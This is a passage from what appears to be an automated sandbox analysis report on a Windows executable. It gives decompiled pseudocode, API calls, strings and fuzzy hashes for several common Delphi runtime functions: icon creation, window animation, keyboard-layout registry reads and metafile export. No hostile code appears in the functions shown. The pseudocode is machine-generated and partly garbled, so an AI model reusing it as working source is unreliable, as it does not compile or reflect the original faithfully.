				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E00420594(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E00421337);
				return E0040274C( *(_t198 - 0x30));
			}

0x0042116e
0x0042117d
0x00421183
0x00421186
0x00421188
0x0042118d
0x0042119e
0x004211a3
0x004211ca
0x004211cd
0x004211cd
0x004211d0
0x004211d1
0x004211d1
0x004211d1
0x0042118d
0x004211df
0x004211eb
0x004211f7
0x00421205
0x00421213
0x0042122d
0x00421240
0x0042124f
0x0042125e
0x0042126d
0x0042127d
0x0042128c
0x00421294
0x0042129f
0x004212a4
0x004212a5
0x004212aa
0x004212ad
0x004212b0
0x004212b6
0x004212be
0x004212cc
0x004212d5
0x004212de
0x004212fa
0x00421308
0x00421310
0x00421312
0x00421312
0x00421319
0x0042131c
0x0042131f
0x0042132f

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0042125E
GetObjectA.GDI32(?,00000018,?), ref: 0042126D
GetBitmapBits.GDI32(?,?,?), ref: 004212BE
GetBitmapBits.GDI32(?,?,?), ref: 004212CC
DeleteObject.GDI32(?), ref: 004212D5
DeleteObject.GDI32(?), ref: 004212DE
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00421300

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: f904337ceea57774f54c04814782ccd7b69f4f9cd6a71772fda4147054334f95
Instruction ID: 0eaf06afbd50e3b4658a88fd21f84cbb42fcff3ffb0e50a3ced3ad64ef04db03
Opcode Fuzzy Hash: f904337ceea57774f54c04814782ccd7b69f4f9cd6a71772fda4147054334f95
Instruction Fuzzy Hash: 0E610571A00229AFCB00DFA9D881DAEBBF9FF49304B554466F904EB351D734AD51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004408BC, Relevance: 10.7, APIs: 7, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004408BC(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t85;
				void* _t113;
				intOrPtr _t129;
				intOrPtr _t138;
				void* _t141;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t113 = __ecx;
				_v8 = __eax;
				_t138 =  *0x48e838; // 0x48fc00
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t141);
				_push(0x440a83);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xffffffe0;
				E00438CEC(_v8, __ecx, __ecx, _t138);
				_v16 = _v16 + 4;
				E00439F48(_v8,  &_v28);
				if(E00456844() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00456844() -  *(_v8 + 0x4c);
				}
				if(E00456850() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00456850() -  *(_v8 + 0x48);
				}
				if(E00456838() > _v28) {
					_v28 = E00456838();
				}
				if(E0045682C() > _v16) {
					_v16 = E0045682C();
				}
				SetWindowPos(E0043F370(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E004045D8(_t113) < 0x64 &&  *0x4718cc != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00443B10( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x4718cc(E0043F370(_v8), 0x64,  *0x004719D4 | 0x00040000);
					}
				}
				ShowWindow(E0043F370(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(0x440a8a);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t85 = _v8;
				 *((char*)(_t85 + 0x210)) = 0;
				return _t85;
			}

0x004408ca
0x004408cb
0x004408cc
0x004408cd
0x004408ce
0x004408d0
0x004408d3
0x004408dc
0x004408e5
0x004408e6
0x004408eb
0x004408ee
0x004408f6
0x004408fb
0x00440905
0x0044091c
0x0044092b
0x0044092b
0x00440940
0x0044094f
0x0044094f
0x0044095c
0x00440965
0x00440965
0x00440972
0x0044097b
0x0044097b
0x004409a1
0x004409b9
0x004409e1
0x004409ea
0x004409f9
0x00440a02
0x00440a10
0x00440a1b
0x00440a1b
0x00440a1b
0x00440a3f
0x00440a3f
0x004409ea
0x00440a50
0x00440a5a
0x00440a5f
0x00440a62
0x00440a65
0x00440a72
0x00440a78
0x00440a7b
0x00440a82

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00440A83), ref: 004409A1
GetTickCount.KERNEL32 ref: 004409A6
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 004409E1
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 004409F9
AnimateWindow.USER32(00000000,00000064,00000001), ref: 00440A3F
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00440A83), ref: 00440A50
GetTickCount.KERNEL32 ref: 00440A6A

Part of subcall function 00443B10: GetCursorPos.USER32(?), ref: 00443B14

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: 3864e15b6e2ca29c20f0d56c3f12c3d45805c60426092f5295886dac922d4af8
Instruction ID: b8171982469b21851f7d2e4dcd9bec4a606e817161d5f98fa6c2a4dddf90cd7a
Opcode Fuzzy Hash: 3864e15b6e2ca29c20f0d56c3f12c3d45805c60426092f5295886dac922d4af8
Instruction Fuzzy Hash: 30516174A00205EFEB10EFA9C982A9EB7F5EF04304F60456AF540E7356D778AE44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00456A90, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00456A90(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x456c3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x456c42);
					return E00404320( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403584(1);
					E00404320(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E004163C4( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00443F80( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00409258( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x456bf7);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404588( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404588(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x456bfe);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}

0x00456a91
0x00456a93
0x00456a9c
0x00456aa2
0x00456aa7
0x00456aa8
0x00456aad
0x00456ab0
0x00456aba
0x00456c1c
0x00456c24
0x00456c27
0x00456c2a
0x00456c3a
0x00456ac0
0x00456acf
0x00456ad8
0x00456aeb
0x00456aee
0x00456c0b
0x00456c11
0x00456c17
0x00000000
0x00456af4
0x00456af5
0x00456afe
0x00456b01
0x00456b0d
0x00000000
0x00456b13
0x00456b25
0x00456b2b
0x00456b55
0x00000000
0x00456b5b
0x00456b5d
0x00456b5e
0x00456b63
0x00456b66
0x00456b69
0x00456b8f
0x00456ba2
0x00456bba
0x00456bc8
0x00456bdb
0x00456bdb
0x00456bc8
0x00456be2
0x00456be5
0x00456be8
0x00456bf6
0x00456bf6
0x00456b55
0x00000000
0x00456bfe
0x00456bfe
0x00456c02
0x00456c02
0x00456c02
0x00000000
0x00456b01
0x00456aee
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00456C3B,?,02130F1C,?,00456C9D,00000000,?,0043B2AB), ref: 00456AE6
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00456B4E
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00456BF7,?,80000002,00000000), ref: 00456B88
RegCloseKey.ADVAPI32(?,00456BFE,00000000,?,00000100,00000000,00456BF7,?,80000002,00000000), ref: 00456BF1

Strings

layout text, xrefs: 00456B7F
System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00456B38

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: 4d0d99356437b71de63a44d3386551287ede8089ba210b71d2e0fc9be5e30c92
Instruction ID: 3c4913b094686cf0c2ff5e4cf0cf33b0d09393fbe7615d330e62532ae101903a
Opcode Fuzzy Hash: 4d0d99356437b71de63a44d3386551287ede8089ba210b71d2e0fc9be5e30c92
Instruction Fuzzy Hash: 49416D74A00209AFDB11DF55C981B9EB7F8EB48305F9144EAE904E7392D738EE44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409EAC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409EAC(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;

				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L2:
					_t40 =  *0x48f714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409EA0(_t73);
					L4:
					E00408BDC( &_v273, 0x104, E0040AC88(0x5c, _t89) + 1);
					_t74 = 0x40a02c;
					_t86 = 0x40a02c;
					_t83 =  *0x407720; // 0x40776c
					if(E00403740(_t87, _t83) != 0) {
						_t74 = E004047D0( *((intOrPtr*)(_t87 + 4)));
						_t69 = E00408B78(_t74, 0x40a02c);
						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
							_t86 = 0x40a030;
						}
					}
					_t51 =  *0x48e828; // 0x4074e0
					_t16 = _t51 + 4; // 0xffe7
					_t53 =  *0x48f714; // 0x400000
					LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
					E00403504( *_t87,  &_v1116);
					_v860 =  &_v1116;
					_v856 = 4;
					_v852 =  &_v273;
					_v848 = 6;
					_v844 = _v12;
					_v840 = 5;
					_v836 = _t74;
					_v832 = 6;
					_v828 = _t86;
					_v824 = 6;
					E00409298(_v8,  &_v790, _a4, 4,  &_v860);
					return E00408B78(_v8, _t86);
				}
				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
				_t89 = _t72;
				if(_t72 != 0) {
					_t75 = _t73 - _v820.AllocationBase;
					__eflags = _t75;
					_v12 = _t75;
					goto L4;
				}
				goto L2;
			}

0x00409eb8
0x00409ebb
0x00409ebd
0x00409ec9
0x00409ed8
0x00409ef6
0x00409f02
0x00409f08
0x00409f14
0x00409f22
0x00409f3d
0x00409f42
0x00409f47
0x00409f4e
0x00409f5b
0x00409f65
0x00409f69
0x00409f70
0x00409f79
0x00409f79
0x00409f70
0x00409f8a
0x00409f8f
0x00409f93
0x00409f9e
0x00409fab
0x00409fb6
0x00409fbc
0x00409fc9
0x00409fcf
0x00409fd9
0x00409fdf
0x00409fe6
0x00409fec
0x00409ff3
0x00409ff9
0x0040a015
0x0040a028
0x0040a028
0x00409eed
0x00409ef2
0x00409ef4
0x00409f19
0x00409f19
0x00409f1f
0x00000000
0x00409f1f
0x00000000

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409EC9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EED
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F08
LoadStringA.USER32 ref: 00409F9E

Strings

lw@, xrefs: 00409F4E
t@, xrefs: 00409F8A

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: lw@$t@
API String ID: 3990497365-1029788205
Opcode ID: a595ac5f2271262c7460aa13557c5e4e922478f33d1bb439d2843ed51e9a283f
Instruction ID: 3c1774db47878605661622ad82335aef62b3931344819077a0ac3d570add622f
Opcode Fuzzy Hash: a595ac5f2271262c7460aa13557c5e4e922478f33d1bb439d2843ed51e9a283f
Instruction Fuzzy Hash: 864121719002589BDB21DF59CC85BDAB7BCAB08344F0040FAA548F7292D778AF948F59

Uniqueness

Uniqueness Score: -1.00%

Function 00409EAA, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409EAA(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L3:
					_t40 =  *0x48f714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409EA0(_t74);
				} else {
					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
					_t101 = _t72;
					if(_t72 != 0) {
						_t77 = _t74 - _v820.AllocationBase;
						__eflags = _t77;
						_v12 = _t77;
					} else {
						goto L3;
					}
				}
				E00408BDC( &_v273, 0x104, E0040AC88(0x5c, _t101) + 1);
				_t75 = 0x40a02c;
				_t89 = 0x40a02c;
				_t85 =  *0x407720; // 0x40776c
				if(E00403740(_t92, _t85) != 0) {
					_t75 = E004047D0( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408B78(_t75, 0x40a02c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a030;
					}
				}
				_t51 =  *0x48e828; // 0x4074e0
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x48f714; // 0x400000
				LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
				E00403504( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00409298(_v8,  &_v790, _a4, 4,  &_v860);
				return E00408B78(_v8, _t89);
			}

0x00409eb8
0x00409ebb
0x00409ebd
0x00409ec9
0x00409ed8
0x00409ef6
0x00409f02
0x00409f08
0x00409f14
0x00409eda
0x00409eed
0x00409ef2
0x00409ef4
0x00409f19
0x00409f19
0x00409f1f
0x00000000
0x00000000
0x00000000
0x00409ef4
0x00409f3d
0x00409f42
0x00409f47
0x00409f4e
0x00409f5b
0x00409f65
0x00409f69
0x00409f70
0x00409f79
0x00409f79
0x00409f70
0x00409f8a
0x00409f8f
0x00409f93
0x00409f9e
0x00409fab
0x00409fb6
0x00409fbc
0x00409fc9
0x00409fcf
0x00409fd9
0x00409fdf
0x00409fe6
0x00409fec
0x00409ff3
0x00409ff9
0x0040a015
0x0040a028

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409EC9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EED
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F08
LoadStringA.USER32 ref: 00409F9E

Strings

lw@, xrefs: 00409F4E
t@, xrefs: 00409F8A

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: lw@$t@
API String ID: 3990497365-1029788205
Opcode ID: 2a004b60225c12480c7459b73294bdc07f2efa1739b3e88cf04f6e4892dd5603
Instruction ID: 01f810e6b90fd811f6012997ed2deb681909e466dfb8905640863207e18db97e
Opcode Fuzzy Hash: 2a004b60225c12480c7459b73294bdc07f2efa1739b3e88cf04f6e4892dd5603
Instruction Fuzzy Hash: 3E413071A002589BDB21DB59CC85BDAB7FC9B08344F0040FAB548F7292D778AF948F59

Uniqueness

Uniqueness Score: -1.00%

Function 004230C0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004230C0(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402EC8( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00421384( &_v38);
					_v18 = _t43;
					_push(0);
					L00406E30();
					_v16 = _t43;
					_push(_t83);
					_push(0x4231fb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E0040272C(_v12);
					_push(_t83);
					_push(0x4231db);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00420594(_t67);
					}
					E004166D8(_t80, 0x16,  &_v38);
					E004166D8(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x4231e2);
					return E0040274C(_v8);
				}
			}

0x004230c1
0x004230c3
0x004230c8
0x004230ca
0x004230d0
0x00423207
0x004230d6
0x004230e0
0x004230e5
0x004230e8
0x004230ef
0x004230f6
0x00423100
0x004230f8
0x004230f8
0x004230f8
0x00423117
0x0042312e
0x00423135
0x0042313a
0x0042313e
0x00423140
0x00423145
0x0042314a
0x0042314b
0x00423150
0x00423153
0x00423169
0x00423174
0x00423179
0x0042317a
0x0042317f
0x00423182
0x0042319f
0x004231a1
0x004231a1
0x004231b0
0x004231bd
0x004231c4
0x004231c7
0x004231ca
0x004231da
0x004231da

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00423112
MulDiv.KERNEL32(?,?,000009EC), ref: 00423129
7378AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00423140
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004231FB,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00423164
GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004231DB,?,?,00000000,00000000,00000008,?,00000000,004231FB), ref: 00423197

Strings

`, xrefs: 004230F8

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsFileMeta$7378
String ID: `
API String ID: 3504215381-2679148245
Opcode ID: d0b049e8ebd3e649995efa6524b31437e11736486cb54f243495e1a693e6386e
Instruction ID: 513da4453e2b76be0c26d28001fe48ad55a34af8564f53d1149453300fdc6d59
Opcode Fuzzy Hash: d0b049e8ebd3e649995efa6524b31437e11736486cb54f243495e1a693e6386e
Instruction Fuzzy Hash: 1F317675B00218ABDB01DFD5D882ABEB7B8EF0D704F514456F904EB281D67C9E50C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00440BC8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00440BC8(void* __eax) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				char _t19;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x48e5b4; // 0x48fa94
					_t17 =  *0x48e5b4; // 0x48fa94
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L004268A8();
					_v8 = _t19;
					_push(_t49);
					_push(0x440c88);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x48e838; // 0x48fc00
					_t23 = E00456D18( *_t21,  *((short*)(__eax + 0x68)));
					_t4 =  &_v8; // 0x436d56
					E004268E0( *_t4, _t23);
					_t26 =  *0x48e838; // 0x48fc00
					_t28 = E00456D18( *_t26,  *((short*)(_t39 + 0x68)));
					_t6 =  &_v8; // 0x436d56
					E004268E0( *_t6, _t28);
					_push(0);
					_push(0);
					_push(0);
					_t7 =  &_v8; // 0x436d56
					_push( *_t7);
					L00426934();
					_push( &_v16);
					_push(0);
					L00426944();
					_push(_v12);
					_push(_v16);
					_push(1);
					_t11 =  &_v8; // 0x436d56
					_push( *_t11);
					L00426934();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x440c8f);
					_t12 =  &_v8; // 0x436d56
					_t37 =  *_t12;
					_push(_t37);
					L004268B0();
					return _t37;
				}
			}

0x00440bc9
0x00440bcb
0x00440bcf
0x00440bd6
0x00440c93
0x00440bdc
0x00440be4
0x00440bf0
0x00440bf7
0x00440bf9
0x00440bfa
0x00440bff
0x00440c04
0x00440c05
0x00440c0a
0x00440c0d
0x00440c14
0x00440c1b
0x00440c22
0x00440c25
0x00440c2e
0x00440c35
0x00440c3c
0x00440c3f
0x00440c44
0x00440c46
0x00440c48
0x00440c4a
0x00440c4d
0x00440c4e
0x00440c56
0x00440c57
0x00440c59
0x00440c61
0x00440c65
0x00440c66
0x00440c68
0x00440c6b
0x00440c6c
0x00440c73
0x00440c76
0x00440c79
0x00440c7e
0x00440c7e
0x00440c81
0x00440c82
0x00440c87
0x00440c87

APIs

73D61AB0.COMCTL32(00000000), ref: 00440BFA

Part of subcall function 004268E0: 73D62140.COMCTL32(VmC,000000FF,00000000,00440C2A,00000000,00440C88,?,00000000), ref: 004268E4

73D61680.COMCTL32(VmC,00000000,00000000,00000000,00000000,00440C88,?,00000000), ref: 00440C4E
73D61710.COMCTL32(00000000,?,VmC,00000000,00000000,00000000,00000000,00440C88,?,00000000), ref: 00440C59
73D61680.COMCTL32(VmC,00000001,?,00440CF1,00000000,?,VmC,00000000,00000000,00000000,00000000,00440C88,?,00000000), ref: 00440C6C
73D61F60.COMCTL32(VmC,00440C8F,00440CF1,00000000,?,VmC,00000000,00000000,00000000,00000000,00440C88,?,00000000), ref: 00440C82

Strings

VmC, xrefs: 00440C22, 00440C3C, 00440C4A, 00440C68, 00440C7E, 00440C4D, 00440C6B, 00440C81

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
